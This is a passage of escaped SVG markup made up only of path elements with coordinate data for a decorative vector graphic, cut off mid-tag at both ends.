d=\"M324.5,40.8c5.4.7-5.9.3-7.8.6,6.7.1,11.6.1,16.7,0C328.9,41.3,328.8,40.9,324.5,40.8Z\"></path>\n        <path d=\"M0,33.6H0V34a24.24,24.24,0,0,0,3.4.2C3.3,34,2.2,33.7,0,33.6Z\"></path>\n        <path d=\"M7.9,31.5c-3-.2-4.9,0-7.3-.4-1.6.4,0,.8,4.6.5.6.8-4,1.8,3.7,2.6-.5-.2,1.4-.2,1-.4-2.9-.1-5.6-1.3.3-1.3C10.6,32.1,4.7,31.7,7.9,31.5Z\"></path>\n        <path d=\"M281.8,39.6c.2.2-3.9,0-4,.1,3.8,0,3,.3,5.9.4C285.3,40,285.1,39.7,281.8,39.6Z\"></path>\n        <path d=\"M310.4,40.6c.4-.3-1.7-.5-6.1-.6C304.8,40.3,306.8,40.5,310.4,40.6Z\"></path>\n        <path d=\"M302.2,39.1c-4.7-.2-.8.3-5.5.1,1.5.2.5.6,4.7.7C303.3,39.7,302.4,39.4,302.2,39.1Z\"></path>\n        <path d=\"M297.4,38.4c-8.1-.3-1.5.7,1.7.4C297.5,38.8,297.4,38.6,297.4,38.4Z\"></path>\n        <path d=\"M335,38.5c-1.1.1-.9.6,3.4.7A9.43,9.43,0,0,0,335,38.5Z\"></path>\n        <path d=\"M360.1,38.7a25.51,25.51,0,0,1-4.1,0c3.9.5-1.2.7-5.3.3-1.4.3,9.8.5,10,.3C355.6,39.1,365.3,38.9,360.1,38.7Z\"></path>\n        <path d=\"M304.7,37.3c.3.4,4,.5,6.3.8,1.6-.1,7.1-.4.7-.7C312.9,38,307.5,37.4,304.7,37.3Z\"></path>\n        <path d=\"M344,37.6c.1.3,4.2.4,6.1.6-.2-.2.5-.2,1.1-.3C347.2,37.9,347.3,37.7,344,37.6Z\"></path>\n        <path d=\"M347.9,35.8c1.5.2.5.6,4.8.7C352.6,36.1,352.2,35.8,347.9,35.8Z\"></path>\n        <path d=\"M291.2,34.6c.3-.4,3.8-.7-1.9-.6C293,34.2,284.7,34.4,291.2,34.6Z\"></path>\n        <path d=\"M280.1,33c1.1.7,9,.2,11.1,0C286.2,32.7,286.4,33.5,280.1,33Z\"></path>\n        <path d=\"M347.2,33.5c-4.3-.1-2.6.3-3.8.5C347.9,34.1,347.8,33.8,347.2,33.5Z\"></path>\n        <path d=\"M331.3,32.8c-.1.1-.2.3-2.6.2-.2.3,2.3.4,6,.5A8.62,8.62,0,0,0,331.3,32.8Z\"></path>\n        <path d=\"M338,30.8c-2.1.5-2.6.5-7.8.6,3,.3,6.6,0,10,.3C335.4,31.3,345,31.2,338,30.8Z\"></path>\n        <path d=\"M117,114.4c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A20.13,20.13,0,0,1,117,114.4Z\"></path>\n        <path d=\"M312.3,113.8c5.3.2,13.1.2,9.6-.1C321.3,114.2,312.6,113.3,312.3,113.8Z\"></path>\n        <path d=\"M227.3,108.8c-.7.6,1.8.9-1.8,1.2,2.8.1,2.1.3,5.9.4C227.6,109.9,235.6,109,227.3,108.8Z\"></path>\n        <path d=\"M345.3,108.6c-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.18,17.18,0,0,1,5.2-.4,2.23,2.23,0,0,0,1.4,0c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6C346,108.2,348,108.6,345.3,108.6Z\"></path>\n        <path d=\"M407.8,111.8c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C406.2,112,412.1,111.9,407.8,111.8Z\"></path>\n        <path d=\"M367.7,108.8c-5-.1,2.7-.3-1.7-.4-9.8.5-1.9,1.9-5.1,2.1,2.8,0,6.2.6,8.6.3C360.7,110.3,364.3,109,367.7,108.8Z\"></path>\n        <path d=\"M542.5,111.7c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C550.3,112.4,545.3,112,542.5,111.7Z\"></path>\n        <path d=\"M372.5,107.9c-9.1-.3-.3.9,1.9.6C371.3,108.4,373.4,108.1,372.5,107.9Z\"></path>\n        <path d=\"M347.2,104.4c3.2,1,2.4,1.5-5.3,1.8,3.6.1,5.6.3,6.1.6a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8C348.6,104.7,348.6,104.2,347.2,104.4Z\"></path>\n        <path d=\"M263.7,36.5c6.8.2,2.1.2,1.8.5,3.1,0,4.6.2,4.5.4a15.72,15.72,0,0,0-3.8.5c4.9,0,5.8-.3,9.3-.4a49.56,49.56,0,0,1-7.4-.5c.2-.3,4.2-.2,5.3-.3-3.7-.1-6.1-.2-6-.5C265.6,36.2,263.2,36.2,263.7,36.5Z\"></path>\n        <path d=\"M369.4,60.3c-1-.3-2.2-.4.9-.5-1.3-.2-4.7-.3-7.3-.4C362,59.8,367.2,60,369.4,60.3Z\"></path>\n        <path d=\"M174.1,64.2c4.8.3.4,1.2,8.4,1.6-2.3.2-4.3-.2-7,0,8.7.6,2.6,1.2,8.8,2.1-3.6-1,5.3-2-4.1-3a14.92,14.92,0,0,0,2.2-.5C181,64.4,175.8,63.9,174.1,64.2Z\"></path>\n        <path d=\"M164.2,48.1c.2-.1.3-.1.4-.2C164,47.9,163.7,48,164.2,48.1Z\"></path>\n        <path d=\"M329.2,36.7c-4,.6-9,.4-17.6.5,3.3.4,5.3.1,7.2.3-3.7.1,2.7.5,3.4.7-1.2.8-4.4,1.3.4,2.1-2.5,0-5-.4-5.7-.1,5,0,1.6.5,6.1.6-2.3-.6-.8-.1,4.1,0-1-.3-2.6-.6-3.6-1,1.5-.1,5.2-.1,6.8-.2-4.3-.2,3.1-.1,1-.4-4.1-.2-3.6.1-7,0-.1-.1-1.3-.2-1.6-.3,3.3,0,6.5,0,6.7-.3a36.81,36.81,0,0,1-4.2-.1c2.6,0-3.8-1,3.8-.5.1-.2-1.9-.6,2.5-.4C327.4,37.2,336.5,37,329.2,36.7Z\"></path>\n        <path d=\"M403.3,73.5c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A72.1,72.1,0,0,1,403.3,73.5Z\"></path>\n        <path d=\"M361.2,99.8c-4.4-.2-3,.7-2.3.6C360,100.2,362.6,100.2,361.2,99.8Z\"></path>\n        <path d=\"M310.5,99.1l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C305.8,98.5,308.6,99.1,310.5,99.1Z\"></path>\n        <path d=\"M502.5,102.5c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C500.4,102.5,501.4,102.5,502.5,102.5Z\"></path>\n        <path d=\"M360.4,95.7c6.3.3,2.6-.4,8.2-.1,3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-2.4.1-1.2.9-6.6.4C363.6,95.5,358.5,95.3,360.4,95.7Z\"></path>\n        <path d=\"M120.1,89.5c.8-.1,2.8-.1,5.5-.1a29.61,29.61,0,0,0-4.7-.7C125.3,89.1,116,89.5,120.1,89.5Z\"></path>\n        <path d=\"M382.1,92c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4h-4.1c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.2.5.7,1.2-7.4,1,7.1.2-.9.4-.9.5,8.4.3,1.9,1,5.6,1.7-6-.1-2.8.2-.7.7-7-.3-4.2.3-8,.4,14.9,1,2.7,2-.3,2.3,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8,2.2.1,4.6.3,4.6.5a13.78,13.78,0,0,1-4.7.4c1.2.1-1.7.7,1.3.5,9.1-1,8.4,2.6-2.4,2,1.1.3,6.1.4,6.3.8-3.4.1-3,.6-7.8.6.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0c1.7.3,4.8.7.7.8a27.48,27.48,0,0,0-7.3-.4c3.7.3.7,1.2-.3,1.2,1.5.4,4.5,0,7.1.2.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-2.5-.2-3.5-.6-6.3-.8,3.1.5-2.2.5.9,1,3.4.2,5.1-.2,5.7.1-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C374.7,92.8,373.4,91.8,382.1,92Z\"></path>\n        <path d=\"M359.9,82.1h-.3a.19.19,0,0,0,.27,0h0Z\"></path>\n        <path d=\"M492,95.4c2.4,0,3.8.2,4.3.1-3.2-.1-.3-.6-4.7-.7C491.7,95.1,491.9,95.2,492,95.4Z\"></path>\n        <path d=\"M204.4,85.9a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3-3.6-.2-3.2.5-.7.7-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2C200.6,86.3,209,86.3,204.4,85.9Z\"></path>\n        <path d=\"M392.2,89.3c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C401.2,90.9,390.6,89.7,392.2,89.3Z\"></path>\n        <path d=\"M327.2,89.6c1.9,0,3.8.1,5.7.1C334.1,88.7,332.4,89.5,327.2,89.6Z\"></path>\n        <path d=\"M408.2,90.1c-1.8,0-7.3,1.1-1.9,1C403.4,90.8,409,90.5,408.2,90.1Z\"></path>\n        <path d=\"M442.5,89.7c.4.5-8.9,2.1,1.6,1.8C445.8,90.9,447.1,90.6,442.5,89.7Z\"></path>\n        <path d=\"M213.8,83.9c-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4-2.1-.3-6.9-.1-7.2-.3,7.5-.3-3.4-1.6,5-2.2-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1,1.1-.4,4.7-.7,10.9-.3-6.1-.6,2.2-.5-.8-.9-2,.5-4.2-.4-8.8-.5-.5.6-1.6.7,2.4,1.1-9.9.9-2,2.7-5,3.8-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4,1.4.6-4.4.3-6.6.4a123.68,123.68,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2C211,85.4,220.4,84.6,213.8,83.9Z\"></path>\n        <path d=\"M438.3,89.6c-.4-.4-5.4-.5-7.7-.8C426.5,88.3,433.2,89.6,438.3,89.6Z\"></path>\n        <path d=\"M307.7,86.4c1.9,0,5.6.5,5.8.2-5-.5-.6-.9,3-1.4-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8C308.2,85.2,310.1,85.7,307.7,86.4Z\"></path>\n        <path d=\"M175.7,80.1c-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3,7.9.4-1.4,1.1,4.1,1.5C171.9,80.7,172.1,80.3,175.7,80.1Z\"></path>\n        <path d=\"M178.7,80.4c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C181.7,80.9,182.8,80.5,178.7,80.4Z\"></path>\n        <path d=\"M322.1,83.9c.5-.3,2.4.2,4.4.2,1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2C321.9,83.3,316.9,83.6,322.1,83.9Z\"></path>\n        <path d=\"M480.2,86.8c4.4.2,2.5-.2,6.9-.1l-.3-.3C483.1,86.4,482.9,86.7,480.2,86.8Z\"></path>\n        <path d=\"M328.7,81.8c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C330.5,81.6,324.6,81.6,328.7,81.8Z\"></path>\n        <path d=\"M180.8,76.4c-1.5-.4,1.3-.5.6-.9-6.1,0,1.9-.6-3.5-.8C174.3,75.1,177.2,75.9,180.8,76.4Z\"></path>\n        <path d=\"M317.6,75.6c-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1,0,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4,1.4.5-.1.7-3.5.8,4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.6,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6C315.7,75.9,318.1,75.9,317.6,75.6Z\"></path>\n        <path d=\"M125.9,72.3c5.2,0,3,.4,7.3.4,1.9-.1-1.1-.8-3.1-.4-.5-.2,6.5-.6-.7-.8,2.1.6-2.2.8-5.3.3-3.9,0,3,1.1-3.4.9,4.4.4,3.3.6,5,1C130.1,73.5,121.2,72.6,125.9,72.3Z\"></path>\n        <path d=\"M277.7,74.5c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C277.5,75.2,277,74.8,277.7,74.5Z\"></path>\n        <path d=\"M123.3,69.5c-5.4,0-14.7-.4-18.3-.3,7.2.2,7.8.9,13.6,1.2C114.9,69.7,119.3,69.6,123.3,69.5Z\"></path>\n        <path d=\"M314.7,72.3c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C315.3,70.8,321.9,73.3,314.7,72.3Z\"></path>\n        <path d=\"M330.1,69.3c-.4.2-.1.5-3.9.3-3.2-1.2,2.4-1.7,7.2-2.9,5.5.3-1.8.8.8.9a21.29,21.29,0,0,1,4.3.1c-1.2-.6,1.8-.8-2.5-1.3-.1.1-.2.3-2.6.2-2-.4.6-.5-2-.7-6.5.1-7.7-.4-7.1-.8a23.81,23.81,0,0,1-4.7.1c1.8-.3-.8-.4.8-.6,2.6.1,4.1.3,3.9.5a9.45,9.45,0,0,1,2.8-.8c1.2-.4-3.8-.4-3.4-.7,5.4.1,7.3-.3,5-.7-6.9-.3-1.4.6-6.5.5-1.3-.5,5-.5.5-1a40.91,40.91,0,0,0,7,0c-4.2-1-.7-1.4-4.7-2.2,2.8.1,2.1.3,5.9.4-3.2-1.6-.5-3.1-5.5-4.7,5.1.2.8-.7,5.3-.4-5.9-.6,2.4-1-4.4-1.8,0,.1-1.7,0-1.5-.1,3.8,0,3,.3,5.9.4-1-.2,1.1-.6-2-.7,0,.1-.2.3-2.6.2-.3-.8,2.5-1.3,5.4-1.7,2.1.4,1.5.5-.8.6,2.7.1,3-.1,5.6,0-4.3-1.1-12.6-1.6-12.2-2.8-5.7-.3-3.1.2-6.8.2.3.3,4,.5,4.8.8-6,.6.6,2.1,1.1,2.9a36.35,36.35,0,0,0-5.9-.3c-.1.3,3,.4,4.7.7-7.2,0,.3,1.3-5.7,1.4.2-.4-8.6-.7-7.1-.2,10.6,0,10.4,2,10.6,2.5,3.6.1-.6.9,3.8,1.2-1.2.1-5.2-.1-4,.2,4.7,0,4.8.9,8.1,1.3-1.8,0-1.8.1-4.2,0,0-.3-.4-.6-4.7-.7,3.6.5,1.6,1.1.3,1.7a22.65,22.65,0,0,0-6.2-.5c4.1.2,0,.5.6.7,1.7,0,3.5.1,5.2.1-.6.3-.6.7,1.3.9-4.4-.2-2.8-.1-7.1-.2.2.3,2.7.4,2,.7-5.3-.2-6.1,0-5.2.4,3.4-.1,2.6-.2,8.1-.3.6.2,2.3.5.6.7-6.6-.6-.7.2-7.1-.2-1.3.5-3.8.9-5.7,1.4,5.4.2.5-.6,6.7-.3a4,4,0,0,1,.6.7c-3.3-.1-5.3-.1-5.5.1,13.5.2,2.9,2,13.6,2.8-2.2-.1-3.7-.2-5.9-.4.6.2-1.7.2-2.5.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5,6,.4.1.5.9,1,6.1.3-.3-.6,3.8-.5.2.1,2.6.2,3,.3,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0C331.5,69.7,332.8,69.4,330.1,69.3Z\"></path>\n        <path d=\"M330.6,65.1c.6-.1-2.2-.6.9-.5,1.5,0,3.6,0,1.3-.1-1.9,0-3.8-.1-5.7-.1C329.5,64.6,325.9,64.8,330.6,65.1Z\"></path>\n        <path d=\"M330.6,55.6c.4,0,.9.1,1.4.1C331.5,55.7,331,55.6,330.6,55.6Z\"></path>\n        <path d=\"M334.3,70.9c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C332.7,72,335.1,71.2,334.3,70.9Z\"></path>\n        <path d=\"M100.6,68.9c-4,.2,5,1.1,3.5.8C101.7,69.3,105.1,69.2,100.6,68.9Z\"></path>\n        <path d=\"M250.8,72.3c-1,.3,6.7,1,6.1.6C251,72.9,256.6,72.3,250.8,72.3Z\"></path>\n        <path d=\"M241.5,72.8c4.4.2,2.5-.2,6.9-.1-.9-.2,1.2-.5-1.9-.6C248.8,72.7,241.7,72.4,241.5,72.8Z\"></path>\n        <path d=\"M150.4,70.4c-2.5.6,13.8.6,7.1.2C157.5,71.1,153.1,70.4,150.4,70.4Z\"></path>\n        <path d=\"M128.7,69.2c-.9.1-3.5.7-.9.5.1-.4,5.5.4,5.6,0a26.2,26.2,0,0,1-2.8-.1C130.1,69.6,130.7,69.3,128.7,69.2Z\"></path>\n        <path d=\"M136.2,68.3c5.7.2-.1.3.6.7,4.6,0,4-.6,10.8-.4-2.8-.1-2.1-.3-5.9-.4.4.2-1.2.2-4.1.1A6.55,6.55,0,0,0,136.2,68.3Z\"></path>\n        <path d=\"M151.8,65.6c-1.2.3,3.1.2,3.4.4.3-.1.6-.1.9-.2C154.2,65.8,153,65.7,151.8,65.6Z\"></path>\n        <path d=\"M154.8,66.1c-2.7-.1-2.9-.4-5.7-.5-.9.4,4.7.8-.8.7-4.7-.5,2.5-1-3.9-1.3-3.6.5-1.6.3-.3,1.2,7.5.3,4.6.5,12.1,1.1C152.9,66.8,153.1,66.5,154.8,66.1Z\"></path>\n        <path d=\"M155.2,66c-.2,0-.3.1-.4.1a.79.79,0,0,0,.4-.1C155.2,66.1,155.3,66,155.2,66Z\"></path>\n        <path d=\"M337,70.8c4.1.4.7.5,3.5.8C343.3,71.4,340.9,70.9,337,70.8Z\"></path>\n        <path d=\"M504.7,75.1C513,74.8,500.8,73.7,504.7,75.1Z\"></path>\n        <path d=\"M111.9,64.4c3.7.6,5,1.3,11.2,1.7C117.3,65.5,118.7,64.6,111.9,64.4Z\"></path>\n        <path d=\"M478.4,72.1c-.9.6,2.7,1.4,6.9,1.6C481.2,73.3,483.5,72.5,478.4,72.1Z\"></path>\n        <path d=\"M142.5,62.8c-.8-.1-1.7-.3-3.1-.4-4,.2,2.4.5,4.7.7.8,1-2.8,1.1,1.7,1.9.9-.2,5.5.4,7.5.6,1.3-.6-9-1.2-1.3-1.4a22.48,22.48,0,0,0,5.9.4c-1.8-.2-3.8-.4-6.1-.6-1.4-.5,1.9-.6,3.5-.8-2.1-.1-5.2-.1-5.8-.2-.1-.2,9,0,3.9-.3-2.4.2-4.8-.6-9-.7,2.6.5-3.5.1-3.9.4,5.5.2-.1.4,4.8.7A7.34,7.34,0,0,0,142.5,62.8Z\"></path>\n        <path d=\"M401,70.9c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C397,70.4,403.4,70.7,401,70.9Z\"></path>\n        <path d=\"M250.3,67c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C252.5,66.4,253.3,66.9,250.3,67Z\"></path>\n        <path d=\"M115.9,64.2c.3-.4-1.2-.7-4.9-.9,2.2.4,4.2.5.6.7C113.5,64,114.7,64.1,115.9,64.2Z\"></path>\n        <path d=\"M102.2,62.9c-2.5.1.9.3,1.9.6-1,.1-8.3.1-3.9.3a19.39,19.39,0,0,1,4.1-.1c1.3-.1,1-.4,2.3-.5A36,36,0,0,1,102.2,62.9Z\"></path>\n        <path d=\"M414.4,70.3c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C408.1,70.2,416.9,70.8,414.4,70.3Z\"></path>\n        <path d=\"M444.3,71.2c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C445.8,70.7,440.7,70.9,444.3,71.2Z\"></path>\n        <path d=\"M279.2,66.6c3.2-.3,5.2.4,7.4.5.7-.6-2.5-1.1.2-1.3C284.1,66,274.1,66,279.2,66.6Z\"></path>\n        <path d=\"M212.2,64.8a17.8,17.8,0,0,1-3-.2,26.15,26.15,0,0,0,2.8,0c-1.4,0-2.8-.1-4.2-.1,1.5.2,1,.6,3.4.7C210.7,65,212.6,65,212.2,64.8Z\"></path>\n        <path d=\"M113,62.5c-.5.2,3,.8,4.7.5-2.5-.1-3.4-.3-3.2-.5,1.9,0,3.2.1,4.4.2C118.2,62.2,115.3,62.4,113,62.5Z\"></path>\n        <path d=\"M45.6,60.2c4.9-.1,1.2.4,4.6.4-1.8-.5.5-1.3-4.3-1.7C47.3,59.4,47.9,59.8,45.6,60.2Z\"></path>\n        <path d=\"M133.7,60.7c-9.2-.3-9.2-.5-17.4-.8-1.9,0,.2.4-2.5.4-2.4-.2,1.9-.7-4.9-.9,4.7,1.1,1,1.7,4.8,2.3,0-.2,5.4.2,7.2.3-.5-.6,6.3-.6.3-1.2,5.2,0,10.4-.2,12.8.4a20.27,20.27,0,0,0-2.7,0c2.1,0,5.3.2,5.6,0C134.4,61.2,133.5,61,133.7,60.7Z\"></path>\n        <path d=\"M353.4,65.7c3.7.1,6.1.2,6,.5-.9-.1-5.7-.4-5.7-.1a33.79,33.79,0,0,1,4.5.3c0-.3,6.6,0,5.2-.4A79.44,79.44,0,0,0,353.4,65.7Z\"></path>\n        <path d=\"M149.1,61c7.9-.3-.5-.7-2.7-1.5,5.7-.3-.1-.6,3.4-.9a33.9,33.9,0,0,1-4.5-.3c0,.1-.2.3-2.6.2,1.1.3,3.4.6-2.4.5,1.9-.5-1.7.1-7.1-.2.4.2-.2.4,1.8.5,0-.7,3.5.7,5.8.2-3.6-.1-.4-.4,2.5-.3.3.6-5.3.6-6,1.1,7.6.2,6.9.9,3.7,1.1,3.1.3,2.7,0,5.8.2.4-.6,10.4-.2,13.4-.6C155.9,60.9,150.9,61.2,149.1,61Z\"></path>\n        <path d=\"M333.5,65.2c1.1.1,2.8.1,2.9.2-1.8,0-2.8.1-2.5.3,3.8.1,12,0,5.3-.3-.2.4-3.7.1-1.5-.1A34.6,34.6,0,0,0,333.5,65.2Z\"></path>\n        <path d=\"M252.7,63.7c-.6-.5,6.1-.3,6.6-.7-2.3-.3-3.3.1-4.4-.2-1.6-.5,4.4-.6,1.9-1a15.43,15.43,0,0,1-2.8-.1C255.1,62.4,251.8,63.2,252.7,63.7Z\"></path>\n        <path d=\"M252.7,63.7c.1.1.2.1.4.2C252.9,63.8,252.8,63.7,252.7,63.7Z\"></path>\n        <path d=\"M60.3,59.4c-1.9-.6.6-.7-2.4-1.1C58.8,58.8,52.7,59,60.3,59.4Z\"></path>\n        <path d=\"M48.1,58.3c3.4.1,3.5.4,6.1.6-3.1-.5,6.1-.4.7-.7-.6.1-1.3.2-2.5.3A16.74,16.74,0,0,0,48.1,58.3Z\"></path>\n        <path d=\"M343.9,64.4a40.66,40.66,0,0,0-8.1.3c3.4.1,3.5.4,6.1.6a17.85,17.85,0,0,0-3.4-.7C340.9,64.5,345.6,64.7,343.9,64.4Z\"></path>\n        <path d=\"M135.7,59.9c-1.7-.1-1.7-.2-1.7-.4-6,0-4.2-.5-8.9-.6C126,59.3,134.1,59.9,135.7,59.9Z\"></path>\n        <path d=\"M365,64.7c.5-.2-4.3-.7-4.6-.4,3.2.1.4.6,4.7.7-.1-.3,5.4,0,5.3-.3a21.62,21.62,0,0,1-3-.3C368.1,64.6,367.5,64.8,365,64.7Z\"></path>\n        <path d=\"M357.6,64.1a79.55,79.55,0,0,1-10-.3c-.9.4-.2.5,3.5.8a29.54,29.54,0,0,1,5.4-.2c.1.1,1.3.2,1.4,0C355.4,64.4,358,64.3,357.6,64.1Z\"></path>\n        <path d=\"M79.6,57.7c.3.4,6.4.6,7.8.9C87.3,58.1,82.7,57.9,79.6,57.7Z\"></path>\n        <path d=\"M70.6,55.4c-1.8-.1-3.4-.1-3-.3-1.2.2-2.1,1-1.6,1.4a8.16,8.16,0,0,1,2.7,0c-.8.4-3.7.5-4.8.9,1.9.3.9.7,4.9.9C69.6,57,72.3,56.5,70.6,55.4Z\"></path>\n        <path d=\"M0,56.3c1,.1,2.5-.1,0-.7Z\"></path>\n        <path d=\"M100.5,57.8c-2.5.2-.3.7,2.2.9C98.5,58.2,106.2,58.1,100.5,57.8Z\"></path>\n        <path d=\"M104.7,57.8l.2.2a6.8,6.8,0,0,1,1.5.1c4.7.2.8-.3,5.5-.1,1.9.2.8.7,3.5.8-1.9-.4,2-.2,2.4-.4-3.1-.1-1-.4-1.9-.6,4,.2,6.2.3,9.9.2-3.3-.5.2-1.1-2.3-1-2.3.2.2.8-6.5.5,1.1-.1,1.6-.3.9-.5-4.9,0-10.9.3-7.6.8C106.5,57.8,107.4,57.7,104.7,57.8Z\"></path>\n        <path d=\"M340.2,63.3c5.9.2-1.2.4,3.3.6-.2-.2,3.7-.1,2.5-.4C342.5,63.6,342,63,340.2,63.3Z\"></path>\n        <path d=\"M127.9,57.3c-3.1.2,1.8.8,3.7,1.1C133.7,58.2,128.9,57.7,127.9,57.3Z\"></path>\n        <path d=\"M337.8,62.2h-4.2c0-.1-1.3-.2-1.4,0,3.7.1,1.5.5,6,.5C340.3,62.4,337.9,62.5,337.8,62.2Z\"></path>\n        <path d=\"M292.9,60.2c-3.4.2-6.4.4-10.7.5,2,.2,5.3.2,7.3.4.2-.2-2.1-.3-3.1-.4C290.9,60.8,295.4,60.6,292.9,60.2Z\"></path>\n        <path 